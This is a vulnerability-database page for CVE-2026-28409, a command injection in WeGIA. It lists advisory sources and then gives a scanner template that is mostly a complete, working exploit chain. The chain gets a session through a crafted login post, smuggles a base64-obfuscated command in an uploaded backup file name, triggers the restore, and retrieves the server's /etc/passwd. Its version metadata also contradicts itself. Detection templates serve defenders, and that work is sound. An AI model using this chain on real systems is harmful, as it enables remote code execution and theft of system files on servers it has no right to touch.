| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-28409 | 27 Feb 202621:50 | – | attackerkb | |
| CVE-2026-28409 | 28 Feb 202600:56 | – | circl | |
| WeGIA 操作系统命令注入漏洞 | 27 Feb 202600:00 | – | cnnvd | |
| CVE-2026-28409 | 27 Feb 202621:50 | – | cve | |
| CVE-2026-28409 WeGIA Vulnerable to Remote Code Execution (RCE) via OS Command Injection | 27 Feb 202621:50 | – | cvelist | |
| EUVD-2026-9080 | 27 Feb 202621:50 | – | euvd | |
| CVE-2026-28409 | 27 Feb 202622:16 | – | nvd | |
| CVE-2026-28409 WeGIA Vulnerable to Remote Code Execution (RCE) via OS Command Injection | 27 Feb 202621:50 | – | osv | |
| PT-2026-22412 | 27 Feb 202600:00 | – | ptsecurity | |
| CVE-2026-28409 | 1 Mar 202601:43 | – | redhatcve |
id: CVE-2026-28409
info:
name: WeGIA <= 3.6.4 - Remote Code Execution
author: 0x_Akoko
severity: critical
description: |
WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands
impact: |
Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise.
remediation: |
Upgrade to version 3.6.5 or later.
reference:
- https://cxsecurity.com/issue/WLB-2026030009
- https://github.com/LabRedesCefetRJ/WeGIA
- https://nvd.nist.gov/vuln/detail/CVE-2026-28409
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-28409
epss-score: 0.03315
epss-percentile: 0.87089
cwe-id: CWE-78
metadata:
verified: true
max-request: 4
vendor: labredescefetRJ
product: wegia
shodan-query: http.html:"WeGIA"
fofa-query: body="WeGIA"
tags: cve,cve2026,wegia,rce
variables:
filename: "{{to_lower(rand_text_alpha(8))}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
POST /WeGIA/html/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
c=true&cpf=admin&id_pessoa=1
extractors:
- type: regex
name: session
part: header
group: 1
regex:
- 'PHPSESSID=([a-zA-Z0-9]+)'
internal: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
- raw:
- |
POST /WeGIA/html/configuracao/importar_dump.php HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
Content-Type: multipart/form-data; boundary=----test0boundary
------test0boundary
Content-Disposition: form-data; name="usuario"
1
------test0boundary
Content-Disposition: form-data; name="id_pessoa"
1
------test0boundary
Content-Disposition: form-data; name="import"; filename="dump;export F={{filename}};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz"
Content-Type: application/gzip
{{hex_decode("1f8b08000000000000030300000000000000000000")}}
------test0boundary--
matchers:
- type: dsl
dsl:
- 'status_code == 302'
internal: true
- raw:
- |
GET /WeGIA/html/configuracao/gerenciar_backup.php?action=restore&file=dump%3Bexport+F%3D{{filename}}%3Beval+%24%28echo+Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ%3D+%7C+base64+-d%29%3Bpoc.dump.tar.gz&usuario=1&id_pessoa=1 HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
- raw:
- |
GET /WeGIA/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022019e9e1a3ffdd16a4863d77560ef5de45a2f0ebc5a9003e780be11f8920af328402207efaa1a3bd8297ae900088642e6180caaea1517f56a70387b488f5e65a3348a1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation